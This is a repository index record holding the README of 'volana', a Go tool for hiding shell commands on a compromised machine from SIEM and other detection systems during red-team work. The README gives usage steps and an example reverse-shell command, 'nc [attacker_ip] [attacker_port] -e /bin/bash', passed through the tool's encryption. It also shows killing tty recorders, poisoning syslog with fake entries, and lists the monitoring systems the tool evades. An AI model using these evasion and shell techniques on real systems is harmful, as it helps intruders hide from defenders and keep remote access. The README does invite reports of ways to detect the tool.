{"id":13639117,"url":"https://github.com/ariary/volana","last_synced_at":"2025-04-26T19:31:45.452Z","repository":{"id":109493495,"uuid":"445226449","full_name":"ariary/volana","owner":"ariary","description":"🌒 Shell command obfuscation to avoid detection systems","archived":false,"fork":false,"pushed_at":"2022-10-10T19:20:52.000Z","size":89,"stargazers_count":125,"open_issues_count":0,"forks_count":11,"subscribers_count":6,"default_branch":"main","last_synced_at":"2025-04-04T17:11:33.523Z","etag":null,"topics":["exploitation","infosec","obfuscator","pentest","pentest-tool","redteam","security","shell-obfuscate"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"unlicense","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ariary.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-01-06T15:55:41.000Z","updated_at":"2025-03-23T08:54:48.000Z","dependencies_parsed_at":"2023-06-09T01:15:14.851Z","dependency_job_id":null,"html_url":"https://github.com/ariary/volana","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Fvolana","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Fvolana/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Fvolana/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Fvolana/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ariary","download_url":"https
://codeload.github.com/ariary/volana/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":251041419,"owners_count":21527189,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["exploitation","infosec","obfuscator","pentest","pentest-tool","redteam","security","shell-obfuscate"],"created_at":"2024-08-02T01:00:57.843Z","updated_at":"2025-04-26T19:31:45.153Z","avatar_url":"https://github.com/ariary.png","language":"Go","funding_links":[],"categories":["Go"],"sub_categories":[],"readme":"\n\u003cdiv align=\"center\"\u003e\n\u003ch3\u003e\u003ci\u003evolana\u003csub\u003e (moon in Malagasy)\u003c/sub\u003e\u003c/i\u003e\u003c/h3\u003e\n\u003cimg src=\"https://github.com/ariary/volana/blob/main/img/moon.png\"\u003e\n\n\n\u003cp\u003e\u003cstrong\u003e\u003cpre\u003e\u003ccode\u003e{ \u003ca href=\"#usage\"\u003eUse it\u003c/a\u003e ; \u003ca href=\"#hide-from\"\u003e🌚\u003csub\u003e(hide from)\u003c/sub\u003e\u003c/a\u003e; \u003ca href=\"#visible-for\"\u003e🌞\u003csub\u003e(detected by)\u003c/sub\u003e\u003c/a\u003e } \u003c/code\u003e\u003c/pre\u003e\u003c/strong\u003e\u003c/p\u003e\n\u003ch4\u003e Shell command obfuscation to avoid SIEM/detection systems \u003c/h4\u003e\n \u003cp\u003e During a pentest, an important aspect is to \u003cb\u003ebe stealthy\u003c/b\u003e. For this reason you should \u003cb\u003eclear your tracks after your passage\u003c/b\u003e. 
Nevertheless, many infrastructures log commands and send them to a SIEM in real time, making the cleanup afterwards useless on its own.\u003cbr\u003e\u003cbr\u003e\u003ccode\u003evolana\u003c/code\u003e provides a simple way to hide commands executed on a compromised machine by providing its own shell runtime (enter your command, volana executes it for you). This way you \u003cb\u003eclear your tracks DURING your passage\u003c/b\u003e.\u003c/p\u003e\n\u003c/div\u003e\n\n## Usage\n\nYou need to get an interactive shell. (Find a way to spawn it, you are a hacker, it's your job! [otherwise](#from-non-interactive-shell)). Then download it on the target machine and launch it. That's it, now you can type the commands you want to be stealthily executed.\n```shell\n## Download it from the GitHub release\n## If you do not have internet access from the compromised machine, find another way\ncurl -LO https://github.com/ariary/volana/releases/latest/download/volana\n\n## Execute it\n./volana\n\n## You are now under the radar\nvolana » echo \"Hi SIEM team! 
Do you find me?\" \u003e /dev/null 2\u003e\u00261  # you are allowed to be a bit cocky\nvolana » [command]\n```\n\nKeywords for the volana console:\n* `ring`: enable ring mode, i.e. each command is launched together with plenty of others to cover tracks (against solutions that monitor system calls)\n* `exit`: exit the volana console\n\n### from non-interactive shell\n\nImagine you have a non-interactive shell (webshell or blind RCE); you could use the `encrypt` and `decrypt` subcommands.\nFirst, you need to build `volana` with an embedded encryption key.\n\n**On attacker machine**\n```shell\n## Build volana with an encryption key\nmake build.volana-with-encryption\n\n## Transfer it to TARGET (the only detectable command)\n## [...]\n\n## Encrypt the command you want to stealthily execute\n## (Here an nc bindshell to obtain an interactive shell)\nvolana encr \"nc [attacker_ip] [attacker_port] -e /bin/bash\"\n\u003e\u003e\u003e ENCRYPTED COMMAND\n```\n\nCopy the encrypted command and execute it with your RCE **on target machine**\n```shell\n./volana decr [encrypted_command]\n## Now you have a bindshell, spawn it to make it interactive and use volana as usual to stay stealthy (./volana). + Don't forget to remove the volana binary before leaving (because the decryption key can easily be retrieved from it)\n\n```\n\n***Why not just hide the command with `echo [command] | base64`?***\nAnd decode it on target with `echo [encoded_command] | base64 -d | bash`\n\nBecause we want to be protected against systems that trigger an alert on `base64` use or that look for base64 text in commands. Also we want to make investigation difficult, and base64 isn't a real obstacle.\n\n## Detection\n\nKeep in mind that `volana` is not a miracle that will make you totally invisible. Its aim is to make intrusion detection and investigation harder.\n\nBy detected we mean whether an alert can be triggered when a certain command has been executed.\n\n\n### Hide from\n\nOnly the `volana` launching command line will be caught. 
🧠 **However, by adding a space** before executing it, the default bash behavior is to not save it.\n\n* Detection systems that are based on the `history` command output\n* Detection systems that are based on history files\n  * `.bash_history`, `.zsh_history`, etc.\n* Detection systems that are based on bash debug traps\n* Detection systems that are based on the sudo built-in logging system\n* Detection systems tracing all process syscalls system-wide (e.g. `opensnoop`)\n* Terminal (tty) recorders (`script`, `screen -L`, [`sexonthebash`](https://github.com/ariary/sexonthebash), `ovh-ttyrec`, etc.)\n  * Easy to detect \u0026 avoid: `pkill -9 script`\n  * Not a common case\n  * `screen` is a bit more difficult to avoid; however, it does not record input (secret input: `stty -echo` =\u003e avoided)\n  * Command detection could be avoided with `volana` with encryption\n\n### Visible for\n\n* Detection systems that have an alert for unknown commands (the volana one)\n* Detection systems that are based on a keylogger\n  * Easy to avoid: copy/paste commands\n  * Not a common case\n* Detection systems that are based on syslog files (e.g. `/var/log/auth.log`)\n  * Only for `sudo` or `su` commands\n  * syslog files could be modified and thus poisoned as you wish (e.g. for */var/log/auth.log*: `logger -p auth.info \"No hacker is poisoning your syslog solution, don't worry\"`)\n* Detection systems that are based on syscalls (e.g. auditd, LKM/eBPF)\n  * Difficult to analyze, could be made unreadable by making several diversion syscalls\n* Custom `LD_PRELOAD` injection to produce logs\n  * Not a common case at all\n\n## Bug bounty\n\nSorry for the clickbait title, but no money will be provided for contributors. 
🐛\n\n Let me know if you have found:\n* a way to detect `volana`\n* a way to spy on the console that doesn't detect `volana` commands\n* a way to avoid a detection system\n\n[Report here](https://github.com/ariary/volana/issues/new/choose)\n\n## Credit\n* [8 ways to spy on console](https://github.com/annmuor/zn2021_8ways)\n* [moonwalk](https://github.com/mufeedvh/moonwalk): similar tool that clears tracks AFTER passage\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fariary%2Fvolana","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fariary%2Fvolana","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fariary%2Fvolana/lists"}